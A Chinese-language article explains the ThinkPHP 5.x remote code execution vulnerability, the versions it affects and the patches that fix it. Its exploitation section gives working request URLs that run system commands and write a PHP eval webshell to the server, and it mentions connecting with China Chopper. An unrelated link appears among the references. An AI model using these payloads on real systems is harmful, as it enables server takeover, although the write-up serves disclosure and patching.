ThinkPHP遠程代碼執行漏洞是什么樣的

本篇文章為大家展示了ThinkPHP遠程代碼執行漏洞是什么樣的，內容簡明扼要并且容易理解，絕對能使你眼前一亮，通過這篇文章的詳細介紹希望你能有所收獲。

ThinkPHP是一個快速、簡單的基于MVC和面向對象的輕量級PHP開發框架。

Thinkphp5.x版本中存在一個嚴重的遠程代碼執行漏洞。這個漏洞的主要原因是由于框架對控制器名沒有進行足夠的校驗導致在沒有開啟強制路由的情況下可以構造惡意語句執行遠程命令

影響范圍

Thinkphp 5.1.0 - 5.1.31

Thinkphp 5.0.5 - 5.0.23

漏洞利用

環境介紹：

thinkphp5.0.22+php5.4.45+ apache2.4.23

1.首先搭建好相應的環境，頁面訪問如下：

2.當看到框架為thinkphp5.x時，我們需要的就是驗證是否存在遠程代碼執行漏洞

http:// localhost/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

3.確認此處存在遠程代碼執行后，寫入shell

http:// localhost/public/index.php?s =index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php eval(@$_POST['a']); ?>

4.嘗試用菜刀進行連接，連接成功

當然這里我們也可以選擇直接上傳大馬

相比手工，我們也可以選擇工具直接getshell都是可以的

修復建議
1、打補?。?br/>Thinkphp v5.0.x補丁地址:
https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f
Thinkphp v5.1.x補丁地址: 
https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815
2、更新框架版本

參考鏈接

exploit地址：

https://www.exploit-db.com/exploits/45978

框架下載地址：

http://www.thinkphp.cn/donate/download/id/1125.html

docker漏洞環境源碼：

https://github.com/vulnspy/thinkphp-5.1.29

https://www.gendan5.com

上述內容就是ThinkPHP遠程代碼執行漏洞是什么樣的，你們學到知識或技能了嗎？如果還想學到更多技能或者豐富自己的知識儲備，歡迎關注億速云行業資訊頻道。